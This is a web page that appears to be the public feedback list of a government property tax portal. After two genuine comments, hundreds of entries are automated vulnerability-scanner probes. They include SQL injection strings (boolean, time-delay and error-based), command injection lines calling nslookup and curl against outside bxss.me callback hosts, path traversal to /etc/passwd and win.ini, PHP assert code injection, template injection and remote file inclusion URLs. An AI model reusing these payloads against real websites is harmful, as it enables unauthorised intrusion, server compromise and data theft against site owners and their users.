• Screen Reader
  • Skip to Main Content
  • Sitemap
  • facebook twitter
  • Official Login
emblem

Feedback Form

All Feedbacks
S.No. Full Name Feedback
1 Vivek The Portal for Property Tax works fine and I am able to register and add property on the portal. Hope this shall be implemented soon!
2 Suraj The purpose of the property tax is to provide better facilities to the citizens. It is a good initiative for the upliftment of the various wards of respective Local bodies in terms of basic infrastructure and ease of living.
3 HfjNUlYZ
4 zFPWdwPk
5 zFPWdwPk -1 OR 2+998-998-1=0+0+0+1 --
6 zFPWdwPk -1 OR 3+998-998-1=0+0+0+1 --
7 zFPWdwPk -1 OR 3*2<(0+5+998-998) --
8 zFPWdwPk -1 OR 3*2>(0+5+998-998) --
9 zFPWdwPk -1 OR 2+183-183-1=0+0+0+1
10 zFPWdwPk -1 OR 3+183-183-1=0+0+0+1
11 zFPWdwPk -1 OR 3*2<(0+5+183-183)
12 zFPWdwPk -1 OR 3*2>(0+5+183-183)
13 zFPWdwPk -1' OR 2+188-188-1=0+0+0+1 --
14 zFPWdwPk -1' OR 3+188-188-1=0+0+0+1 --
15 zFPWdwPk -1" OR 2+216-216-1=0+0+0+1 --
16 zFPWdwPk -1" OR 3+216-216-1=0+0+0+1 --
17 zFPWdwPk -1" OR 3*2<(0+5+216-216) --
18 zFPWdwPk 0"XOR( *if(now()=sysdate(),sleep(15),0))XOR"Z
19 zFPWdwPk (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
20 zFPWdwPk -1)); waitfor delay '0:0:15' --
21 zFPWdwPk -1 waitfor delay '0:0:15' --
22 zFPWdwPk LSfGSmJR'; waitfor delay '0:0:15' --
23 zFPWdwPk iSoUA9uC'); waitfor delay '0:0:15' --
24 zFPWdwPk vMK5SR3D')); waitfor delay '0:0:15' --
25 zFPWdwPk -1 OR 966=(SELECT 966 FROM PG_SLEEP(15))--
26 zFPWdwPk -1)) OR 720=(SELECT 720 FROM PG_SLEEP(15))--
27 zFPWdwPk *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
28 zFPWdwPk '"
29 zFPWdwPk
30 zFPWdwPk
31 -1 OR 2+325-325-1=0+0+0+1 --
32 -1 OR 3+325-325-1=0+0+0+1 --
33 -1 OR 3*2<(0+5+325-325) --
34 -1 OR 3*2>(0+5+325-325) --
35 -1 OR 2+991-991-1=0+0+0+1
36 -1 OR 3*2>(0+5+991-991)
37 -1' OR 2+263-263-1=0+0+0+1 --
38 -1' OR 3+263-263-1=0+0+0+1 --
39 -1' OR 3*2<(0+5+263-263) --
40 -1' OR 3*2>(0+5+263-263) --
41 -1' OR 3+505-505-1=0+0+0+1 or 'dLi8B7dK'='
42 -1' OR 3*2<(0+5+505-505) or 'dLi8B7dK'='
43 -1' OR 3*2>(0+5+505-505) or 'dLi8B7dK'='
44 -1" OR 2+85-85-1=0+0+0+1 --
45 -1" OR 3*2<(0+5+85-85) --
46 -1" OR 3*2>(0+5+85-85) --
47 if(now()=sysdate(),sleep(15),0)
48 zFPWdwPk0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
49 zFPWdwPk0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
50 (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(
51 zFPWdwPk-1; waitfor delay '0:0:15' --
52 zFPWdwPk-1); waitfor delay '0:0:15' --
53 zFPWdwPk-1 waitfor delay '0:0:15' --
54 zFPWdwPkIhioMEoo'; waitfor delay '0:0:15' --
55 zFPWdwPknKzLp5iq'); waitfor delay '0:0:15' --
56 zFPWdwPkotJ5F6ip' OR 507=(SELECT 507 FROM PG_SLEEP(15))--
57 zFPWdwPk96uHLvvv') OR 833=(SELECT 833 FROM PG_SLEEP(15))--
58 zFPWdwPk4erPiGTA')) OR 756=(SELECT 756 FROM PG_SLEEP(15))--
59 zFPWdwPk'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
60 zFPWdwPk'"
61 zFPWdwPk????%2527%2522\'\"
62 zFPWdwPk
63 pHqghUme
64 pHqghUme response.write(9876155*9638796)
65 pHqghUme /../../../../../../../../../../windows/system32/BITSADMIN.exe
66 /../../../../../../../../../../windows/system32/BITSADMIN.exe
67 pHqghUme '+response.write(9876155*9638796)+'
68 pHqghUme echo dkbsyb$()\ iscako\nz^xyu||a #' &echo dkbsyb$()\ iscako\nz^xyu||a #|" &echo dkbsyb$()\ iscako\nz^xyu||a #
69 pHqghUme "+response.write(9876155*9638796)+"
70 pHqghUme &echo ckitfw$()\ szbbgd\nz^xyu||a #' &echo ckitfw$()\ szbbgd\nz^xyu||a #|" &echo ckitfw$()\ szbbgd\nz^xyu||a #
71 pHqghUme <% response.write(9876155*9638796) %>
72 pHqghUme |echo nkgnfk$()\ lvxorp\nz^xyu||a #' |echo nkgnfk$()\ lvxorp\nz^xyu||a #|" |echo nkgnfk$()\ lvxorp\nz^xyu||a #
73 pHqghUme +response.write(9876155*9638796)'
74 pHqghUme (nslookup -q=cname hitpttczzpdvs0bf3f.bxss.me||curl hitpttczzpdvs0bf3f.bxss.me))
75 response.write(9042364*9704825)
76 pHqghUme $(nslookup -q=cname hitzzlfefucpuc05fb.bxss.me||curl hitzzlfefucpuc05fb.bxss.me)
77 '+response.write(9042364*9704825)+'
78 "+response.write(9042364*9704825)+"
79 pHqghUme &(nslookup -q=cname hitwtjyrksztu79430.bxss.me||curl hitwtjyrksztu79430.bxss.me)&'\"`0&(nslookup -q=cname hitwtjyrksztu79430.bxss.me||curl hitwtjyrksztu79430.bxss.me)&`'
80 pHqghUme |(nslookup -q=cname hitocreighhitc327b.bxss.me||curl hitocreighhitc327b.bxss.me)
81 pHqghUme `(nslookup -q=cname hitvfgdjuxnsme6ecb.bxss.me||curl hitvfgdjuxnsme6ecb.bxss.me)`
82 pHqghUme ;(nslookup -q=cname hitemyrbyoqdq1540b.bxss.me||curl hitemyrbyoqdq1540b.bxss.me)|(nslookup -q=cname hitemyrbyoqdq1540b.bxss.me||curl hitemyrbyoqdq1540b.bxss.me)&(nslookup -q=cname hitemyrbyoqdq1540b.bxss.me||curl hitemyrbyoqdq1540b.bxss.me)
83 pHqghUme |(nslookup${IFS}-q${IFS}cname${IFS}hitarqvyrjkpha0356.bxss.me||curl${IFS}hitarqvyrjkpha0356.bxss.me)
84 <% response.write(9042364*9704825) %>
85 pHqghUme &(nslookup${IFS}-q${IFS}cname${IFS}hitjxbbyzesnh846ff.bxss.me||curl${IFS}hitjxbbyzesnh846ff.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitjxbbyzesnh846ff.bxss.me||curl${IFS}hitjxbbyzesnh846ff.bxss.me)&`'
86 +response.write(9042364*9704825)'
87 pHqghUme ../../../../../../../../../../../../../../etc/passwd
88 pHqghUme ../../../../../../../../../../../../../../windows/win.ini
89 pHqghUme file:///etc/passwd
90 pHqghUme
91 pHqghUme
92 pHqghUme ../
93 pHqghUme ./
94 ../../../../../../../../../../../../../../etc/passwd
95 &echo rtsrdp$()\ xezbrx\nz^xyu||a #' &echo rtsrdp$()\ xezbrx\nz^xyu||a #|" &echo rtsrdp$()\ xezbrx\n
96 ../pHqghUme
97 pHqghUme&echo djqdyn$()\ jkpune\nz^xyu||a #' &echo djqdyn$()\ jkpune\nz^xyu||a #|" &echo djqdyn$()\
98 ./pHqghUme
99 |echo vyofll$()\ lhwcwt\nz^xyu||a #' |echo vyofll$()\ lhwcwt\nz^xyu||a #|" |echo vyofll$()\ lhwcwt\n
100 pHqghUme|echo jngjfb$()\ blvtuw\nz^xyu||a #' |echo jngjfb$()\ blvtuw\nz^xyu||a #|" |echo jngjfb$()\
101 pHqghUme
102 pHqghUme
103 (nslookup -q=cname hitpipemhbvuh67652.bxss.me||curl hitpipemhbvuh67652.bxss.me))
104 $(nslookup -q=cname hitqqssrghswnbf007.bxss.me||curl hitqqssrghswnbf007.bxss.me)
105 12345'"\'\");|]*{ <>?''??
106 &nslookup -q=cname hitxpaotggruz80e61.bxss.me&'\"`0&nslookup -q=cname hitxpaotggruz80e61.bxss.me&`'
107 &(nslookup -q=cname hitkglloqhgoq17a74.bxss.me||curl hitkglloqhgoq17a74.bxss.me)&'\"`0&(nslookup -q=
108
109 `(nslookup -q=cname hitutyqlsgslg4bcd8.bxss.me||curl hitutyqlsgslg4bcd8.bxss.me)`
110 ;(nslookup -q=cname hitcxueoghubq191d4.bxss.me||curl hitcxueoghubq191d4.bxss.me)|(nslookup -q=cname
111 pHqghUme ${10000493+9999174}
112 pHqghUme -1 OR 3+84-84-1=0+0+0+1 --
113 ${9999477+10000410}
114 pHqghUme -1 OR 3*2<(0+5+84-84) --
115 pHqghUme http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
116 pHqghUme -1 OR 3*2>(0+5+84-84) --
117 pHqghUme 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
118 pHqghUme -1 OR 2+870-870-1=0+0+0+1
119 &(nslookup${IFS}-q${IFS}cname${IFS}hitsvxvtfwudwaf278.bxss.me||curl${IFS}hitsvxvtfwudwaf278.bxss.me)
120 pHqghUme -1 OR 3+870-870-1=0+0+0+1
121 eVlmeDU3bjc=
122 pHqghUme -1 OR 3*2<(0+5+870-870)
123 pHqghUme )
124 pHqghUme -1 OR 3*2>(0+5+870-870)
125 pHqghUme !(()&&!|*|*|
126 pHqghUme ^(#$!@#$)(()))******
127 pHqghUme Http://bxss.me/t/fit.txt
128 pHqghUme http://bxss.me/t/fit.txt?.jpg
129 )
130 pHqghUme -1' OR 2+330-330-1=0+0+0+1 --
131 !(()&&!|*|*|
132 ^(#$!@#$)(()))******
133 pHqghUme
134 pHqghUme /etc/shells
135 pHqghUme
136 pHqghUme
137 pHqghUme '.gethostbyname(lc('hituv'.'ljtpdmjm747d9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(83).chr(101).chr(70).'
138 pHqghUme "&&sleep(27*1000)*vdossz&&"
139 pHqghUme ".gethostbyname(lc("hitmx"."ynzfpdbhb0d0b.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(83).chr(118).chr(70)."
140 pHqghUme ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
141 pHqghUme '||sleep(27*1000)*yrxwxy||'
142 pHqghUme ';print(md5(31337));$a='
143 pHqghUme ../../../../../../../../../../../../../../etc/shells
144 pHqghUme ";print(md5(31337));$a="
145 pHqghUme c:/windows/win.ini
146 pHqghUme ${@print(md5(31337))}
147 pHqghUme bxss.me
148 pHqghUme ${@print(md5(31337))}\
149 http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
150 pHqghUme '.print(md5(31337)).'
151 pHqghUme gethostbyname(lc('hitab'.'rabcnxlv4dd68.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(86).chr(111).chr(80)
152 Http://bxss.me/t/fit.txt
153 pHqghUme "||sleep(27*1000)*ykwivf||"
154 ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
155 /etc/shells
156 ';print(md5(31337));$a='
157 pHqghUme -1' OR 3+330-330-1=0+0+0+1 --
158 c:/windows/win.ini
159 bxss.me
160
161 pHqghUme -1' OR 3*2>(0+5+330-330) --
162 '"()
163 pHqghUme -1' OR 2+731-731-1=0+0+0+1 or 'SpvluuMd'='
164 pHqghUme'&&sleep(27*1000)*vxyqsh&&'
165 ".gethostbyname(lc("hiteq"."grjymmtzd8c62.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(73).ch
166 pHqghUme -1' OR 3+731-731-1=0+0+0+1 or 'SpvluuMd'='
167 ";print(md5(31337));$a="
168 pHqghUme"&&sleep(27*1000)*hjlbdc&&"
169 pHqghUme -1' OR 3*2<(0+5+731-731) or 'SpvluuMd'='
170 ${@print(md5(31337))}
171 pHqghUme ctime sleep p0 (I30 tp1 Rp2 .
172 pHqghUme'||sleep(27*1000)*fvbmvc||'
173 pHqghUme -1' OR 3*2>(0+5+731-731) or 'SpvluuMd'='
174 pHqghUme HttP://bxss.me/t/xss.html?%00
175 pHqghUme"||sleep(27*1000)*zjjqfc||"
176 '.print(md5(31337)).'
177 gethostbyname(lc('hitzc'.'tdojbdmf647bd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(73).chr(1
178 pHqghUme "+"A".concat(70-3).concat(22*4).concat(103).concat(80).concat(101).concat(70)+(require"socket" Socket.gethostbyname("hitrk"+"uekjsafm5becc.bxss.me.")[3].to_s)+"
179 pHqghUme feedbackform.aspx
180 pHqghUme '+'A'.concat(70-3).concat(22*4).concat(115).concat(82).concat(121).concat(83)+(require'socket' Socket.gethostbyname('hitor'+'nlbilyab794b2.bxss.me.')[3].to_s)+'
181 pHqghUme paddingfeedbackform.aspx
182 pHqghUme 'A'.concat(70-3).concat(22*4).concat(98).concat(76).concat(111).concat(73)+(require'socket' Socket.gethostbyname('hitvm'+'krxbifkoeed1f.bxss.me.')[3].to_s)
183 pHqghUme bxss.me/t/xss.html?%00
184 "+"A".concat(70-3).concat(22*4).concat(110).concat(65).concat(107).concat(78)+(require"socket" Socke
185 pHqghUme feedbackform.aspx/.
186 pHqghUme paddingfeedbackform.aspx/.
187 '+'A'.concat(70-3).concat(22*4).concat(112).concat(85).concat(98).concat(74)+(require'socket' Socket
188 feedbackform.aspx
189 'A'.concat(70-3).concat(22*4).concat(116).concat(86).concat(108).concat(66)+(require'socket' Socket.
190 pHqghUme '"
191 paddingfeedbackform.aspx
192 pHqghUme propertytax.jk.gov.in
193 https://propertytax.jk.gov.in/
194 '"
195 propertytax.jk.gov.in
196 feedbackform.aspx
197 paddingfeedbackform.aspx
198 feedbackform.aspx/.
199 paddingfeedbackform.aspx/.
200 HttP://bxss.me/t/xss.html?%00
201 bxss.me/t/xss.html?%00
202 pHqghUme 0"XOR( *if(now()=sysdate(),sleep(15),0))XOR"Z
203 pHqghUme (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
204 pHqghUme -1; waitfor delay '0:0:15' --
205 pHqghUme -1); waitfor delay '0:0:15' --
206 pHqghUme -1)); waitfor delay '0:0:15' --
207 pHqghUme -1 waitfor delay '0:0:15' --
208 pHqghUme EJCSyBrI'; waitfor delay '0:0:15' --
209 pHqghUme t122tvyv'); waitfor delay '0:0:15' --
210 pHqghUme -1 OR 899=(SELECT 899 FROM PG_SLEEP(15))--
211 pHqghUme -1) OR 761=(SELECT 761 FROM PG_SLEEP(15))--
212 pHqghUme -1)) OR 370=(SELECT 370 FROM PG_SLEEP(15))--
213 pHqghUme Ibao7kRe' OR 234=(SELECT 234 FROM PG_SLEEP(15))--
214 pHqghUme RY67mklm') OR 598=(SELECT 598 FROM PG_SLEEP(15))--
215 pHqghUme 3Ev7HG9y')) OR 469=(SELECT 469 FROM PG_SLEEP(15))--
216 pHqghUme *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
217 pHqghUme ????%2527%2522\'\"
218 pHqghUme
219 pHqghUme
220 -1 OR 2+976-976-1=0+0+0+1 --
221 -1 OR 3+976-976-1=0+0+0+1 --
222 -1 OR 3*2<(0+5+976-976) --
223 -1 OR 3*2>(0+5+976-976) --
224 -1 OR 2+389-389-1=0+0+0+1
225 -1 OR 3+389-389-1=0+0+0+1
226 -1 OR 3*2<(0+5+389-389)
227 -1' OR 2+282-282-1=0+0+0+1 or 'VqZ83Z0U'='
228 -1' OR 3+282-282-1=0+0+0+1 or 'VqZ83Z0U'='
229 -1' OR 3*2<(0+5+282-282) or 'VqZ83Z0U'='
230 -1' OR 3*2>(0+5+282-282) or 'VqZ83Z0U'='
231 -1" OR 2+713-713-1=0+0+0+1 --
232 -1" OR 3+713-713-1=0+0+0+1 --
233 -1" OR 3*2>(0+5+713-713) --
234 pHqghUme0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
235 pHqghUme0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
236 (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(
237 pHqghUme-1; waitfor delay '0:0:15' --
238 pHqghUme-1); waitfor delay '0:0:15' --
239 pHqghUme-1 waitfor delay '0:0:15' --
240 pHqghUmejLQ4U0nJ'); waitfor delay '0:0:15' --
241 pHqghUmeUjF3HDuJ')); waitfor delay '0:0:15' --
242 pHqghUmeCg9fPEGK') OR 853=(SELECT 853 FROM PG_SLEEP(15))--
243 pHqghUmefTEoF9FC')) OR 582=(SELECT 582 FROM PG_SLEEP(15))--
244 pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
245 pHqghUme'"
246 pHqghUme????%2527%2522\'\"
247 @@BEtzy
248 pHqghUme
249 ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
250 wrBEIRqX 9216662
251 )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
252 wrBEIRqX'"
253 wrBEIRqX bfgx7092??z1??z2a?bcxhjl7092
254 wrBEIRqX <%={{={@{#{${dfb}}%>
255 wrBEIRqX
256 wrBEIRqX
257 wrBEIRqX dfb[[${98991*97996}]]xca
258 wrBEIRqX dfb__${98991*97996}__::.x
259 wrBEIRqX
260 wrBEIRqX
261 Smith 3
262 Smith 3
263 Smith 3
264 Smith 3
265 Smith 3
266 Smith 3
267
268 Smith
269
270 Smith
271
272
273 Smith
274 Smith
275
276
277 Smith
278 Smith
279 Smith
280
281
282 Smith
283 Smith
284
285
286
287
288 Smith
289
290 Smith
291
292 Smith
293 Smith
294 Smith
295
296 Smith
297
298
299 Smith
300 Smith
301 Smith
302
303 Smith
304
305 Smith
306
307
308 Smith
309
310 Smith
311 Smith
312 Smith
313 Smith
314 Smith
315 Smith
316
317 Smith
318
319
320
321 Smith
322 Smith
323 Smith
324 Smith
325 Smith
326 Smith
327 Smith
328
329 Smith
330
331
332 Smith
333 Smith
334 Smith
335
336 Smith
337 Smith
338 Smith
339
340 Smith
341 Smith
342
343
344
345
346 Smith
347 Smith
348 Smith
349 Smith
350
351 Smith
352
353 Smith
354
355 Smith
356 Smith
357 Smith
358 Smith
359 Smith
360
361
362
363
364 Smith
365 Smith
366 Smith
367
368
369 Smith
370 Smith
371
372
373 Smith
374
375
376 Smith
377 Smith
378
379 Smith
380
381 Smith
382
383
384
385 Smith
386
387 Smith
388
389 Smith
390 Smith
391 Smith
392 Smith
393 Smith
394 Smith
395
396 Smith
397
398
399 Smith
400
401
402 Smith
403 Smith
404 Smith
405 Smith
406 Smith
407 Smith
408 Smith
409
410 Smith
411
412 Smith
413
414 Smith
415 Smith
416 Smith
417
418 Smith
419
420 Smith
421
422 Smith
423
424
425 Smith
426
427 Smith
428 Smith
429 Smith
430 Smith
431
432
433
434
435 Smith
436
437 Smith
438 Smith
439 Smith
440 Smith
441 Smith
442 Smith
443
444
445 Smith
446
447
448 Smith
449 Smith
450
451 Smith
452 Smith
453 Smith
454 Smith
455
456
457
458 Smith
459 Smith
460
461 Smith
462
463
464 Smith
465
466 Smith
467 Smith
468
469
470 Smith
471 Smith
472
473 Smith
474
475 Smith
476
477 Smith
478
479
480
481 Smith
482 Smith
483
484 Smith
485 Smith
486 Smith
487
488
489
490
491
492
493
494 Smith
495 Smith
496 Smith
497 Smith
498 Smith
499 Smith
500 Smith
501
502 Smith
503
504
505 Smith
506
507 Smith
508
509 Smith
510
511 Smith
512 Smith
513 Smith
514
515 Smith
516 Smith
517
518 Smith
519 Smith
520 Smith
521 Smith
522
523 Smith
524
525 Smith
526
527 Smith
528 Smith
529
530
531 Smith
532 Smith
533 Smith
534
535 Smith
536 Smith
537 Smith
538
539 Smith
540
541
542
543 Smith
544 Smith
545
546 Smith
547
548 Smith
549
550
551 Smith
552
553
554 Smith
555 Smith
556
557
558 Smith
559 Smith
560 Smith
561 Smith
562
563
564
565
566
567 Smith
568 Smith
569 Smith
570
571 Smith
572 Smith
573
574 Smith
575
576 Smith
577
578 Smith
579
580 Smith
581 Smith
582 Smith
583 Smith
584 Smith
585 Smith
586 Smith
587 Smith
588 Smith
589
590 Smith
591 Smith
592 Smith
593
594
595 Smith
596 Smith
597 Smith
598 Smith
599
600
601
602 Smith
603 Smith
604 Smith
605 Smith
606 Smith
607
608 http://r87.com/n?.aspx
609 Smith
610
611 Smith
612
613
614 Smith
615
616
617
618 http://r87.com/n?.aspx
619 Smith
620 Smith
621 Smith
622 Smith
623 http://r87.com/n?.aspx
624 Smith
625 Smith
626
627
628
629 Smith
630
631
632 php://filter//resource=http://r87.com/n?.aspx
633
634 Smith
635 Smith
636 php://filter//resource=http://r87.com/n?.aspx
637 Smith
638 Smith
639 Smith
640
641 Smith
642
643 -1 OR 1=1
644 Smith
645
646 Smith
647 Smith
648 Smith
649 r87.com/n
650 -1 OR 1=1
651 Smith
652 Smith
653
654 r87.com/n
655 Smith
656 "& SET /A 0xFFF9999-11847 &
657 -1 OR 1=1
658
659 -1 OR 1=1
660
661 Smith
662 "& SET /A 0xFFF9999-37306 &
663
664 Smith
665 Smith
666 '& SET /A 0xFFF9999-69705 &
667
668 Smith
669 '
670 Smith
671 '& SET /A 0xFFF9999-21641 &
672
673
674 Smith
675
676 & SET /A 0xFFF9999-18103 &
677
678 NS-1NO
679
680
681
682 Smith
683 & SET /A 0xFFF9999-83634 &
684
685 Smith
686 Smith
687 Smith
688 -1 AND 'NS='ss
689
690 Smith
691 Smith
692
693 SET /A 0xFFF9999-38646 &
694
695 Smith
696 -1' OR 1=1 OR 'ns'='ns
697
698 Smith
699
700 Smith
701 -1" OR 1=1 OR "ns"="ns
702
703
704 Smith
705 Smith
706 Smith
707 Smith
708
709 -1 OR 17-7=10
710 SET /A 0xFFF9999-33683
711
712
713 Smith
714
715
716
717 Smith
718 Smith
719 Smith
720 Smith
721 Smith
722 Smith
723
724 -1 OR X='ss
725
726 Smith
727 SET /A 0xFFF9999-99364
728
729
730
731
732 Smith
733
734 Smith
735
736 | SET /A 0xFFF9999-59433
737 Smith
738 Smith
739
740 | SET /A 0xFFF9999-63593
741
742 Smith
743
744 -1' OR 1=1 OR '1'='1
745 Smith
746
747
748
749 -1' OR 1=1 OR '1'='1
750 Smith
751 hTTp://r87.com/n
752 Smith
753 Smith
754
755 Smith
756 Smith
757 -1" OR 1=1 OR "1"="1
758 Smith
759
760 Smith
761 Smith hTTp://r87.com/n
762
763 Smith
764
765 http://r87.com/n?.aspx
766 Smith
767 Smith
768
769 -1" OR 1=1 OR "1"="1
770 Smith
771
772 1";expr 268409241 - 7516;"
773
774
775 Smith
776 Smith
777 -1 OR 1=1
778 Smith
779 Smith
780
781 1";expr 268409241 - 44878;"
782 Smith http://r87.com/n?.aspx
783 -1 OR 1=1
784 Smith
785
786
787 Smith
788 -1 OR 1=1
789 http://r87.com/n?.aspx
790 Smith
791
792
793
794
795 1';expr 268409241 - 11013;'
796
797 Smith
798 -1 OR 1=1
799
800 '
801 Smith
802 Smith
803
804 Smith http://r87.com/n?.aspx
805 1';expr 268409241 - 65312;'
806 Smith
807
808 NS-1NO
809 Smith
810
811
812 1;expr 268409241 - 44945;x
813
814
815 Smith
816
817 1;expr 268409241 - 80309;x
818 php://filter//resource=http://r87.com/n?.aspx
819 Smith
820
821 Smith
822 -1 AND 'NS='ss
823 Smith php://filter//resource=http://r87.com/n?.aspx
824 Smith
825
826
827
828
829 Smith
830 r87.com/n
831 Smith
832 -1' OR 1=1 OR 'ns'='ns
833 expr 268409241 - 44132;
834 Smith
835
836 Smith
837 Smith
838
839 Smith r87.com/n
840
841
842 -1" OR 1=1 OR "ns"="ns
843 Smith
844
845 -1 OR 17-7=10
846 expr 268409241 - 38369;
847 Smith
848 Smith
849
850
851
852 Smith
853 -1 OR X='ss
854
855 Smith
856
857
858 expr 268409241 - 3570
859 Smith
860 -1' OR 1=1 OR '1'='1
861 Smith
862 Smith
863
864 Smith
865 Smith
866
867
868
869
870
871 expr 268409241 - 68626
872 -1' OR 1=1 OR '1'='1
873 -1" OR 1=1 OR "1"="1
874
875 Smith
876 Smith
877
878
879
880 Smith
881 Smith
882
883
884
885 -1" OR 1=1 OR "1"="1
886
887
888 Smith
889 Smith
890 Smith
891
892
893
894 Smith
895 |expr${IFS}268409241${IFS}-${IFS}12304
896 Smith
897 Smith
898
899
900
901 Smith
902 Smith
903 Smith
904
905 Smith
906 Smith
907 Smith
908 Smith
909
910
911
912
913 %27
914 Smith
915 Smith
916 Smith
917 Smith
918 Smith
919 %27
920 Smith
921 Smith
922
923
924
925
926 Smith
927 Smith
928 (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
929 Smith
930 Smith
931
932 Smith
933
934 Smith
935 (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
936 Smith
937 Smith
938
939 Smith
940 Smith
941 Smith
942 Smith
943 '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
944 Smith
945 Smith
946
947 Smith
948 Smith
949 Smith
950 Smith
951 Smith
952
953
954
955
956 Smith
957 Smith
958
959 '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
960
961 Smith
962 Smith
963 Smith
964
965 Smith
966
967 convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
968 Smith
969 Smith
970
971
972 convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
973
974
975
976 Smith
977 Smith
978
979
980
981 Smith
982
983 Smith
984 Smith
985 Smith
986 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
987 Smith
988 Smith
989
990 Smith
991
992
993 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
994
995 Smith
996 Smith
997 Smith
998
999
1000 Smith
1001
1002
1003 Smith
1004 -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHA
1005 Smith
1006 Smith
1007 Smith
1008 Smith
1009 Smith
1010
1011 Smith
1012 -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHA
1013 Smith
1014
1015
1016 Smith
1017
1018 -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52
1019 ns:netsparker056650=vuln
1020 Smith
1021 Smith
1022 Smith
1023 Smith
1024 Smith
1025
1026
1027 Smith
1028 Smith
1029 ns:netsparker056650=vuln
1030 Smith
1031 -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52
1032
1033 Smith
1034 Smith
1035 http://example.com/? ns: netsparker056650=vuln
1036
1037 Smith
1038
1039 Smith
1040 Smith
1041 Smith
1042 -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52
1043
1044 http://example.com/? ns: netsparker056650=vuln
1045
1046 Smith
1047 Smith
1048
1049 Smith
1050 -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52
1051 Smith
1052
1053 ns:netsparker056650=vuln
1054 Smith
1055
1056 (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109)
1057 Smith
1058 Smith
1059 Smith
1060 Smith
1061
1062 Smith
1063
1064
1065 Smith
1066 Smith
1067 Smith 3
1068 Smith
1069 ns:netsparker056650=vuln
1070 Smith
1071 (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109)
1072 Smith
1073 Smith
1074
1075
1076 Smith
1077 Smith
1078 Smith
1079 Smith
1080 {{268409241-85722}}
1081 Smith
1082 ns:netsparker056650=vuln
1083 Smith
1084 Smith
1085 cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||c
1086
1087 Smith
1088
1089
1090
1091
1092
1093 Smith
1094
1095
1096 Smith
1097 ns:netsparker056650=vuln
1098 cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||c
1099
1100
1101 Smith 3
1102 Smith
1103
1104
1105 =268409241-12038
1106 Smith
1107 Smith
1108
1109 Smith
1110
1111 Smith
1112
1113
1114 Smith
1115 Smith
1116 Smith
1117
1118 '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)
1119 =268409241-57742
1120 Smith
1121 Smith
1122 Smith
1123 Smith
1124
1125 {{268409241-81552}}
1126
1127 Smith
1128 <%- 268409241-36479 %>
1129
1130 Smith
1131
1132 Smith
1133
1134 <%- 268409241-89695 %>
1135 Smith
1136 Smith
1137
1138 Smith
1139 ${28275*28275-(69067)}
1140 Smith
1141 Smith
1142
1143
1144 '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)
1145 <#assign x=268409241 - 55699> ${x?string["0"]}
1146 ${28275*28275-(12990)}
